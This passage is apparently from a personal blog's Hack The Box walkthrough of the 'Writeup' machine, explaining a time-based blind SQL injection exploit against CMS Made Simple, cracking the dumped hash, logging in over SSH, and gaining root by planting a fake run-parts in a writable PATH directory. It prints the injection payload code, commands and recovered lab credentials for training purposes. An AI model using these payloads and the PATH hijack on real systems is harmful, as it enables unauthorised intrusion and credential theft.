<span class="n">CMS</span> <span class="n">Made</span> <span class="n">Simple</span> <span class="n">Showtime2</span> <span class="n">Module</span> <span class="mf">3.6</span><span class="p">.</span><span class="mi">2</span> <span class="o">-</span> <span class="p">(</span><span class="n">Authenticated</span><span class="p">)</span> <span class="n">Arbitrary</span> <span class="n">File</span> <span class="n">Upload</span>                    <span class="o">|</span> <span class="n">exploits</span><span class="o">/</span><span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">46546.</span><span class="n">py</span>
<span class="o">------------------------------------------------------------------------------------------------------------------------------------------</span></code></pre></figure>


<p>Geez still a large field. Alright, let's ignore the modules and focus on only the core CMS Made Simple since we don't have any more hints as to what is actually installed. With our assumption that we are working with a version released in 2019 let's take a look at <code>CMS Made Simple &lt; 2.2.10 - SQL Injection</code> a little more closely and see if it will be useful for us.</p>

<p>The exploit's functions all repeat a similar pattern for salt, username, email and password. Let's step through one of those and understand what is going on.</p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="p">...</span>
<span class="n">url_vuln</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">url</span> <span class="o">+</span> <span class="s">'/moduleinterface.php?mact=News,m1_,default,0'</span>
<span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">Session</span><span class="p">()</span>
<span class="n">dictionary</span> <span class="o">=</span> <span class="s">'1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'</span>
<span class="p">...</span>
<span class="k">def</span> <span class="nf">dump_username</span><span class="p">():</span>
<span class="p">...</span>
    <span class="k">while</span> <span class="n">flag</span><span class="p">:</span>
        <span class="n">flag</span> <span class="o">=</span> <span class="bp">False</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">dictionary</span><span class="p">)):</span>
            <span class="n">temp_db_name</span> <span class="o">=</span> <span class="n">db_name</span> <span class="o">+</span> <span class="n">dictionary</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
            <span class="n">ord_db_name_temp</span> <span class="o">=</span> <span class="n">ord_db_name</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="n">i</span><span class="p">]))[</span><span class="mi">2</span><span class="p">:]</span>
            <span class="n">beautify_print_try</span><span class="p">(</span><span class="n">temp_db_name</span><span class="p">)</span>
            <span class="n">payload</span> <span class="o">=</span> <span class="s">"a,b,1,5))+and+(select+sleep("</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">TIME</span><span class="p">)</span> <span class="o">+</span> <span class="s">")+from+cms_users+where+username+like+0x"</span> <span class="o">+</span> <span class="n">ord_db_name_temp</span> <span class="o">+</span> <span class="s">"25+and+user_id+like+0x31)+--+"</span>
            <span class="n">url</span> <span class="o">=</span> <span class="n">url_vuln</span> <span class="o">+</span> <span class="s">"&amp;m1_idlist="</span> <span class="o">+</span> <span class="n">payload</span>
            <span class="n">start_time</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">()</span>
            <span class="n">r</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
            <span class="n">elapsed_time</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">start_time</span>
            <span class="k">if</span> <span class="n">elapsed_time</span> <span class="o">&gt;=</span> <span class="n">TIME</span><span class="p">:</span>
                <span class="n">flag</span> <span class="o">=</span> <span class="bp">True</span>
                <span class="k">break</span>
        <span class="k">if</span> <span class="n">flag</span><span class="p">:</span>
            <span class="n">db_name</span> <span class="o">=</span> <span class="n">temp_db_name</span>
            <span class="n">ord_db_name</span> <span class="o">=</span> <span class="n">ord_db_name_temp</span>
    <span class="n">output</span> <span class="o">+=</span> <span class="s">'</span><span class="se">\n</span><span class="s">[+] Username found: '</span> <span class="o">+</span> <span class="n">db_name</span>
    <span class="n">flag</span> <span class="o">=</span> <span class="bp">True</span></code></pre></figure>


<p>Simply put the exploit iterates through the list of characters, attempting to compare to the actual username. When the character matches the stored username the nested sleep function is also triggered - causing the request to take longer than an unsuccessful request by a measure of <code>TIME</code> defined in the code. <a href="http://www.sqlinjection.net/time-based/">sqlinject.net</a> explains this concept:</p>

<blockquote> <i>The attacker may also be interested to extract some information or at least verify a few assumptions. ... this can be done by integrating the time delay inside a conditional statement</i>. </blockquote>

<p>By capturing the <code>elapsed_time</code> while executing the payload we can determine the right first character when the query takes <code>TIME</code> more time. Once successful, the loop stores that character and moves on to the next - repeating the process until no further characters trigger the sleep function, letting us know we have the full value.</p>

<p>Alright enough theory - let's run the exploit and hope for the best.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">python 46635.py <span class="nt">-u</span> http://10.10.10.138/writeup <span class="nt">--crack</span> <span class="nt">--wordlist</span> /root/Desktop/rockyou.txt 

<span class="o">[</span>+] Salt <span class="k">for </span>password found: 5a599ef579066807
<span class="o">[</span>+] Username found: jkr
<span class="o">[</span>+] Email found: jkr@writeup.htb
<span class="o">[</span>+] Password found: 62def4866937f08cc13bab43bb14e6f7
<span class="o">[</span>+] Password cracked: raykayjay9</code></pre></figure>


<p>Bingo, user creds! So here is a proud facepalm moment. Prior to above run, I ran the exploit without <code>--crack</code> or <code>--wordlist</code> and got the same output as above without the password cracked output. In my momentary ignorance I completely ignored that this even looked like a hash, took that line of output verbatim and actually thought this was the password. As you can see below clearly that did not get me far.</p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-writeup/post-exploit1.PNG" />
</p>

<p>Thankfully I quickly realized my error and ran the cracked variant. Just like that we have user access through SSH.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">ssh jkr@10.10.10.138
jkr@10.10.10.138<span class="s1">'s password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ pwd
/home/jkr
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt 
d4e493*******************
jkr@writeup:~$ </span></code></pre></figure>


<h1>Root exploitation</h1>

<p>the usual initial checks did not return anything interesting - sudoers list, running processes, initial poking around at the files. Decided to get a few helper scripts over to the host and see if anything else would come up.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">scp pspy64 jkr@10.10.10.138:/home/jkr/pspy64
jkr@10.10.10.138<span class="s1">'s password: </span></code></pre></figure>


<p>Left pspy running in a terminal while I continued to poke around. There were a few other folks on the machine around the same time as me. At first I didn't think pspy would return anything useful, then I saw a few more people log on and something interesting happened.</p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="mi">2019</span><span class="o">/</span><span class="mi">10</span><span class="o">/</span><span class="mi">01</span> <span class="mi">16</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">13</span> <span class="n">CMD</span><span class="p">:</span> <span class="n">UID</span><span class="o">=</span><span class="mi">0</span>    <span class="n">PID</span><span class="o">=</span><span class="mi">2689</span>   <span class="o">|</span> <span class="n">sshd</span><span class="p">:</span> <span class="p">[</span><span class="n">accepted</span><span class="p">]</span>  
<span class="mi">2019</span><span class="o">/</span><span class="mi">10</span><span class="o">/</span><span class="mi">01</span> <span class="mi">16</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">25</span> <span class="n">CMD</span><span class="p">:</span> <span class="n">UID</span><span class="o">=</span><span class="mi">0</span>    <span class="n">PID</span><span class="o">=</span><span class="mi">2690</span>   <span class="o">|</span> <span class="n">sshd</span><span class="p">:</span> <span class="n">jkr</span> <span class="p">[</span><span class="n">priv</span><span class="p">]</span>  
<span class="mi">2019</span><span class="o">/</span><span class="mi">10</span><span class="o">/</span><span class="mi">01</span> <span class="mi">16</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">25</span> <span class="n">CMD</span><span class="p">:</span> <span class="n">UID</span><span class="o">=</span><span class="mi">0</span>    <span class="n">PID</span><span class="o">=</span><span class="mi">2691</span>   <span class="o">|</span> <span class="n">sh</span> <span class="o">-</span><span class="n">c</span> <span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="nb">bin</span><span class="o">/</span><span class="n">env</span> <span class="o">-</span><span class="n">i</span> <span class="n">PATH</span><span class="o">=/</span><span class="n">usr</span><span class="o">/</span><span class="n">local</span><span class="o">/</span><span class="n">sbin</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">local</span><span class="o">/</span><span class="nb">bin</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">sbin</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="nb">bin</span><span class="p">:</span><span class="o">/</span><span class="n">sbin</span><span class="p">:</span><span class="o">/</span><span class="nb">bin</span> <span class="n">run</span><span class="o">-</span><span class="n">parts</span> <span class="o">--</span><span class="n">lsbsysinit</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">update</span><span class="o">-</span><span class="n">motd</span><span class="p">.</span><span class="n">d</span> <span class="o">&gt;</span> <span class="o">/</span><span class="n">run</span><span class="o">/</span><span class="n">motd</span><span class="p">.</span><span class="n">dynamic</span><span class="p">.</span><span class="n">new</span> 
<span class="mi">2019</span><span class="o">/</span><span class="mi">10</span><span class="o">/</span><span class="mi">01</span> <span class="mi">16</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">25</span> <span class="n">CMD</span><span class="p">:</span> <span class="n">UID</span><span class="o">=</span><span class="mi">0</span>    <span class="n">PID</span><span class="o">=</span><span class="mi">2692</span>   <span class="o">|</span> <span class="n">run</span><span class="o">-</span><span class="n">parts</span> <span class="o">--</span><span class="n">lsbsysinit</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">update</span><span class="o">-</span><span class="n">motd</span><span class="p">.</span><span class="n">d</span> 
<span class="mi">2019</span><span class="o">/</span><span class="mi">10</span><span class="o">/</span><span class="mi">01</span> <span class="mi">16</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">25</span> <span class="n">CMD</span><span class="p">:</span> <span class="n">UID</span><span class="o">=</span><span class="mi">0</span>    <span class="n">PID</span><span class="o">=</span><span class="mi">2693</span>   <span class="o">|</span> <span class="n">uname</span> <span class="o">-</span><span class="n">rnsom</span> 
<span class="mi">2019</span><span class="o">/</span><span class="mi">10</span><span class="o">/</span><span class="mi">01</span> <span class="mi">16</span><span class="p">:</span><span class="mi">25</span><span class="p">:</span><span class="mi">25</span> <span class="n">CMD</span><span class="p">:</span> <span class="n">UID</span><span class="o">=</span><span class="mi">0</span>    <span class="n">PID</span><span class="o">=</span><span class="mi">2694</span>   <span class="o">|</span> <span class="n">sshd</span><span class="p">:</span> <span class="n">jkr</span> <span class="p">[</span><span class="n">priv</span><span class="p">]</span> </code></pre></figure>


<p>So what is happening here? Looks like on SSH connection a logon function gets triggered. I wasn't completely familiar with the various options and flags so took a look at the man pages.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">ENV<span class="o">(</span>1<span class="o">)</span>                                                       User Commands                                                       ENV<span class="o">(</span>1<span class="o">)</span>

NAME
       <span class="nb">env</span> - run a program <span class="k">in </span>a modified environment

SYNOPSIS
       <span class="nb">env</span> <span class="o">[</span>OPTION]... <span class="o">[</span>-] <span class="o">[</span><span class="nv">NAME</span><span class="o">=</span>VALUE]... <span class="o">[</span>COMMAND <span class="o">[</span>ARG]...]

DESCRIPTION
       Set each NAME to VALUE <span class="k">in </span>the environment and run COMMAND.

       Mandatory arguments to long options are mandatory <span class="k">for </span>short options too.

       <span class="nt">-i</span>, <span class="nt">--ignore-environment</span>
              start with an empty environment</code></pre></figure>


<p>Ok so breaking it down: As root, clear out environment variables, set <code>PATH</code> then execute <code>run-parts</code>. Similarly let's look at run-parts' options. You may already know where I went wrong but let's follow my logic as I stepped through.</p>


<figure class="highlight"><pre><code class="language-shell" data-lang="shell">RUN-PARTS<span class="o">(</span>8<span class="o">)</span>                                            System Manager<span class="s1">'s Manual                                            RUN-PARTS(8)

NAME
       run-parts - run scripts or programs in a directory

SYNOPSIS
       run-parts  [--test]  [--verbose]  [--report]  [--lsbsysinit]  [--regex=RE]  [--umask=umask]  [--arg=argument]  [--exit-on-error]
       [--help] [--version] [--list] [--reverse] [--] DIRECTORY

       run-parts -V

DESCRIPTION
       run-parts runs all the executable files named within constraints described below, found in directory directory.  Other files and
       directories are silently ignored.

       If  neither  the  --lsbsysinit  option  nor the --regex option is given then the names must consist entirely of ASCII upper- and
       lower-case letters, ASCII digits, ASCII underscores, and ASCII minus-hyphens.

       If the --lsbsysinit option is given, then the names must not end in .dpkg-old  or .dpkg-dist or .dpkg-new or .dpkg-tmp, and must
       belong  to  one  or  more  of  the  following  namespaces: the LANANA-assigned namespace (^[a-z0-9]+$); the LSB hierarchical and
       reserved namespaces (^_?([a-z0-9_.]+-)+[a-z0-9]+$); and the Debian cron script namespace (^[a-zA-Z0-9_-]+$).

	  ...
       --lsbsysinit
              use LSB namespaces instead of classical behavior.</span></code></pre></figure>


<p>"run scripts or programs in a directory" huh? That sounds amazingly like something we would want to happen. If we could add our own script within <code>/etc/update-motd.d</code> we could trigger it to be executed by root anytime someone ssh'd in to the host. Unfortunately we did not have write capabilities to that folder as jkr and after beating my head against the keyboard for a few minutes I took a step back.</p>

<p>That's when I realized my mistake... take a look at the pspy output again. How is run-parts being run? Explicit location or...relative location! Since we know exactly what <code>PATH</code> is being set to all we have to do is write our own run-parts in one of the PATH locations prior to its regular location. While we didn't have read entitlements at <code>/usr/local/sbin</code> we did have write entitlements. Since I knew the location of the root flag I decided to skip doing anything fancy like a reverse shell and K.I.S.S.</p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">jkr</span><span class="o">@</span><span class="n">writeup</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">local</span><span class="err">$</span> <span class="n">touch</span> <span class="n">sbin</span><span class="o">/</span><span class="n">run</span><span class="o">-</span><span class="n">parts</span>
<span class="n">jkr</span><span class="o">@</span><span class="n">writeup</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">local</span><span class="err">$</span> <span class="n">echo</span> <span class="s">"cat /root/root.txt &gt; /var/tmp/sneaky.txt"</span> <span class="o">&gt;</span> <span class="n">sbin</span><span class="o">/</span><span class="n">run</span><span class="o">-</span><span class="n">parts</span>
<span class="n">jkr</span><span class="o">@</span><span class="n">writeup</span><span class="p">:</span><span class="o">/</span><span class="n">usr</span><span class="o">/</span><span class="n">local</span><span class="err">$</span> <span class="n">chmod</span> <span class="o">+</span><span class="n">x</span> <span class="n">sbin</span><span class="o">/</span><span class="n">run</span><span class="o">-</span><span class="n">parts</span></code></pre></figure>


<p>Now simply open a new terminal and let's hope that everything went smoothly.</p>


<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">jkr</span><span class="o">@</span><span class="n">writeup</span><span class="p">:</span><span class="o">/</span><span class="n">var</span><span class="o">/</span><span class="n">tmp</span><span class="err">$</span> <span class="n">ls</span> <span class="o">-</span><span class="n">latr</span>
<span class="n">total</span> <span class="mi">12</span>
<span class="n">drwxr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="mi">12</span> <span class="n">root</span> <span class="n">root</span> <span class="mi">4096</span> <span class="n">Apr</span> <span class="mi">19</span> <span class="mi">04</span><span class="p">:</span><span class="mi">24</span> <span class="p">..</span>
<span class="n">drwxrwxrwt</span>  <span class="mi">2</span> <span class="n">root</span> <span class="n">root</span> <span class="mi">4096</span> <span class="n">Oct</span>  <span class="mi">1</span> <span class="mi">17</span><span class="p">:</span><span class="mi">12</span> <span class="p">.</span>
<span class="o">-</span><span class="n">rw</span><span class="o">-</span><span class="n">r</span><span class="o">--</span><span class="n">r</span><span class="o">--</span>  <span class="mi">1</span> <span class="n">root</span> <span class="n">root</span>   <span class="mi">33</span> <span class="n">Oct</span>  <span class="mi">1</span> <span class="mi">17</span><span class="p">:</span><span class="mi">12</span> <span class="n">sneaky</span><span class="p">.</span><span class="n">txt</span>
<span class="n">jkr</span><span class="o">@</span><span class="n">writeup</span><span class="p">:</span><span class="o">/</span><span class="n">var</span><span class="o">/</span><span class="n">tmp</span><span class="err">$</span> <span class="n">cat</span> <span class="n">sneaky</span><span class="p">.</span><span class="n">txt</span> 
<span class="n">eeba47</span><span class="o">**********************</span></code></pre></figure>


<p>And just like that Writeup is officially in the books.</p>

<h1>Extra fun</h1>

<p>At some point during the pspy enumeration phase I captured what I can only assume was someone utterly exasperated. Unfortunately for them I was too busy trying to get to the end of this box.<p>

<p>
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
        " data-src="/assets/htb-writeup/womp1.PNG" />
</p>

<p>Thanks folks. Until next time.</p>


</p></p></p></p>

        
      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/hack-the-box/'>hack-the-box</a>
        </div>
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/htb/"
            class="post-tag no-text-decoration" >htb</a>
          
          <a href="/tags/cms/"
            class="post-tag no-text-decoration" >cms</a>
          
          <a href="/tags/pspy/"
            class="post-tag no-text-decoration" >pspy</a>
          
          </div>
        

        <div class="post-tail-bottom
          d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
          
          <div class="license-wrapper">
            This post is licensed under
            <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a>
            by the author.
          </div>
          

          <!--
 Post sharing snippet

 v2.1
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Hack the Box - Writeup - Quantumly Confused&url=https://padraignix.github.io/hack-the-box/2019/10/12/htb-machine-writeup/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Hack the Box - Writeup - Quantumly Confused&u=https://padraignix.github.io/hack-the-box/2019/10/12/htb-machine-writeup/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=Hack the Box - Writeup - Quantumly Confused&url=https://padraignix.github.io/hack-the-box/2019/10/12/htb-machine-writeup/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    
      
        <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://padraignix.github.io/hack-the-box/2019/10/12/htb-machine-writeup/" data-toggle="tooltip" data-placement="top"
          title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin">
          <i class="fa-fw fab fa-linkedin"></i>
        </a>
    

    <i class="fa-fw fas fa-link small" onclick="copyLink()"
        data-toggle="tooltip" data-placement="top" title="Copy link"></i>

  </span>
</div>


        </div><!-- .post-tail-bottom -->

      </div><!-- div.post-tail -->

    </div> <!-- .post -->


  </div> <!-- #post-wrapper -->

  <!--
  The Pannel on right side (Desktop views)
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

  <div class="access">

  <!---->

    <!--












-->

    <!---->

    <div id="access-lastmod" class="post">
      <span>Recent Articles</span>
      <ul class="post-content pl-0 pb-1 ml-1 mt-2">

      
          <li>
            <a href="/quantum-computing/2022/05/29/ibm-quantum-challenge-spring2022/">Qiskit Quantum Challenge - Spring 2022</a>
          </li>
      
          <li>
            <a href="/ctf/2022/05/28/nsec2022-safecracking/">NSEC 2022 - Safe Cracking</a>
          </li>
      
          <li>
            <a href="/ctf/2022/05/22/nsec2022-n64/">NSEC 2022 - N64 - ROM Reverse Engineering</a>
          </li>
      
          <li>
            <a href="/quantum-computing/2022/05/08/qiskit-first-contribution/">Open Source Quantum Computing - First Qiskit Contribution</a>
          </li>
      
          <li>
            <a href="/quantum-computing/2022/04/30/ibm-quantum-challenge-fall2021/">Qiskit Quantum Challenge - Fall 2021</a>
          </li>
      
<!-- Here is where we change logic to not be off of git commits as it's messy and unnecessary 
      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
        
        
        

        

      
-->
      </ul>
    </div><!-- #access-lastmod -->

    <!---->

  <!----> <!-- site.data.updates -->

  















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
